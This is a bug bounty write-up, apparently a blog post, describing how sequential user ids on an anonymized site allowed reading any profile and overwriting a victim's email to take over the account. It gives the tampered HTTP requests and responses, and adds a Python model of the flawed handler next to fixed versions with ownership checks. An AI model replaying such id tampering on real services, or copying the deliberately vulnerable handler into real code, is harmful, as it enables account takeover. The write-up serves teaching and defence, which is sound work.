So, let's call the target target.com. I started by testing the user authentication process, as I like to look for authentication bypasses in an application, but unluckily I had no success there. Since the application has a paid subscription, I created a free account, which was then asked to purchase a subscription to access the content. After roaming around the application, I came to the User Profile section, which sends a request like this:
GET /user/152453 HTTP/1.1
Host: target.com
Cookie: session=xxxxxxxx
I sent this request to Repeater and replaced the UserID with the victim's (152157), which was easily guessable because UserIDs are sequential. The response I got back from the application was a gem:
HTTP/1.1 200 OK

{"user":{"id":152157,"email":"victim@test.com","name":"Victim","membership":1,"created_at":"2020-02-17 18:45:01","updated_at":"2020-02-17 18:45:01","status":1,"device_id":null,"mob_id":null,"phone":"1234567890","dob":"1998-10-14","access":1}}
I was able to get any user's account information, but the fight was not over yet: I needed the user's password to access those accounts. While updating the user profile, I found the /updateuserprofile endpoint, which takes a request like this:
POST /updateuserprofile/152453 HTTP/1.1
Host: target.com
Cookie: session=xxxxxxxx

{"name":"Attacker","email":"attacker@test.com","phone":"1234567890","dob":"2000-01-01"}
I quickly sent the request to Repeater, replaced the attacker's UserID (152453) with the victim's (152157), and got the result I wanted:
HTTP/1.1 200 OK

{"status":"User Data Successfully Updated","user":{"id":152157,"email":"attacker@test.com","name":"Attacker","membership":1,"created_at":"2020-02-17 18:45:01","updated_at":"2020-06-28 15:22:49","status":1,"device_id":null,"mob_id":null,"phone":"1234567890","dob":"2000-01-01","access":1}}
I had successfully replaced the victim's email address and other details with the attacker's. I then logged out and requested a new password for the attacker's email, and YESS!!! I was able to log in to the paid account and access all the paid content. So here's my way to account takeover of any user on the target application. I also found some other ways to get a paid membership for a user, but this one was more interesting and easy.
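Both requests worked for the same reason: the server trusted the user id in the URL path and never compared it with the user behind the session cookie. The following is an added example, not the target's code, that models the two endpoints in Python: the update handler as the write-up found it, beside versions of GET /user/<id> and POST /updateuserprofile/<id> that enforce that comparison and keep email changes out of the direct-update path. The session cookies, user ids and in-memory store are constructed stand-ins.

```python
# Constructed in-memory stand-ins for target.com's session and user tables.
SESSIONS = {"sess_attacker": 152453, "sess_victim": 152157}
USERS = {
    152453: {"email": "attacker@test.com", "name": "Attacker", "membership": 0},
    152157: {"email": "victim@test.com", "name": "Victim", "membership": 1},
}
# Fields a user may set directly. Email is deliberately excluded: changing the
# address without verifying it lets a password reset land in the wrong inbox.
EDITABLE = {"name", "phone", "dob"}

def fresh_store():
    return {uid: dict(row) for uid, row in USERS.items()}  # same start state per call

def update_profile_vulnerable(users, cookie, path_user_id, body):
    """POST /updateuserprofile/<id> as the write-up found it: the id in the URL is trusted."""
    if cookie not in SESSIONS:
        return 401, {"error": "login required"}
    users[path_user_id].update(body)  # no check that path_user_id belongs to the caller
    return 200, {"status": "User Data Successfully Updated", "id": path_user_id, **users[path_user_id]}

def authorize(cookie, path_user_id):
    """Object-level check shared by the read and the update endpoint."""
    uid = SESSIONS.get(cookie)
    if uid is None:
        return 401, None
    if uid != path_user_id:
        return 403, None  # same answer whether or not the id exists, so ids cannot be enumerated
    return 200, uid

def get_profile_fixed(users, cookie, path_user_id):
    status, uid = authorize(cookie, path_user_id)
    return (status, {"id": uid, **users[uid]}) if status == 200 else (status, {"error": "denied"})

def update_profile_fixed(users, cookie, path_user_id, body):
    status, uid = authorize(cookie, path_user_id)
    if status != 200:
        return status, {"error": "denied"}
    if not set(body) <= EDITABLE:
        return 400, {"error": "field not editable", "fields": sorted(set(body) - EDITABLE)}
    users[uid].update(body)
    return 200, {"status": "User Data Successfully Updated", "id": uid, **users[uid]}

def demo():
    """Replay the write-up's request (attacker session, victim id) against both handlers."""
    body = {"name": "Attacker", "email": "attacker@test.com"}
    v_store, f_store = fresh_store(), fresh_store()
    v_status, _ = update_profile_vulnerable(v_store, "sess_attacker", 152157, body)
    f_status, _ = update_profile_fixed(f_store, "sess_attacker", 152157, body)
    return {"vulnerable": (v_status, v_store[152157]["email"]), "fixed": (f_status, f_store[152157]["email"])}
```

Running demo() shows the vulnerable handler returning 200 with the victim's email overwritten, while the fixed handler returns 403 and leaves the record untouched.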
Takeaways:
- Mapping the application always plays a big role in crawling endpoints.
- Always try to increase the impact of the vulnerability.

Explanation and Practice Lab for IDOR: PortSwigger

If you enjoyed reading my article, do clap and follow me on Medium and Twitter:
Twitter: https://twitter.com/_p4nk4j
LinkedIn: https://www.linkedin.com/in/p4nk4jv/